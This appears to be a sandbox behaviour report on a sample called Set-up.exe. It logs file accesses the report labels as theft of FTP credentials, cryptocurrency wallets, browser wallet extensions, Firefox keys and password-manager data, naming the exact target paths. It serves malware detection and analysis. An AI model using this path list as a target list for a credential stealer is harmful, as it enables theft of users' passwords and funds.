Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mbcafoimmibpjgdjboacfhkijdkmjocd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmphdnilpmdejikjdnlbcnmnabepfgkh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmnded	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmjmllblpcbmniokccdoaiahcdajdjof	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hhmkpbimapjpajpicehcnmhdgagpfmjc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmhjnpmdlhokfidldlglfhkkfhjdmhgl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fldfpgipfncgndfolcbkdeeknbbbnhcc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fiikommddbeccaoicoejoniammnalkfa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oiaanamcepbccmdfckijjolhlkfocbgj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flhbololhdbnkpnnocoifnopcapiekdi	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\UltraFXP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Estsoft\ALFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\FTP Now	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\FTPBox	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Estsoft\ALFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Estsoft\ALFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\FTPBox	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\FTPBox	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Local\INSoftware\NovaFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Estsoft\ALFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\FTP Now	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Local\INSoftware\NovaFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\BlazeFtp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\GHISLER	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\BitKinex	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\GHISLER	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Program Files (x86)\GoFTP\settings	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Local\INSoftware\NovaFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\FTP Now	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\BitKinex	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\BlazeFtp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\UltraFXP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\UltraFXP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\GHISLER	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTP Now	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\BlazeFtp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\UltraFXP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\BlazeFtp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\FTP Now	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\BitKinex	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\BitKinex	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\FTPBox	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTPBox	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\BitKinex	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\GHISLER	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Program Files (x86)\DeluxeFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Local\INSoftware\NovaFTP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\UltraFXP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\BlazeFtp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\GHISLER	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Armory	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Armory	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Armory	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Armory	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Armory	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\DashCore\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\DashCore\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\DashCore\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\DashCore\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\DashCore\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\BBQCoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\BBQCoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\BBQCoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\BBQCoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\BBQCoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Megacoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Megacoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Megacoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Megacoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Megacoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mincoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Mincoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Mincoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Mincoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Mincoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Namecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Namecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Namecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Namecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Namecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Primecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Primecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Primecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Primecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Primecoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Terracoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Terracoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Terracoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Terracoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Terracoin	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Ledger Live	Jump to behavior

Tries to steal from password manager

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\1Password\data	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
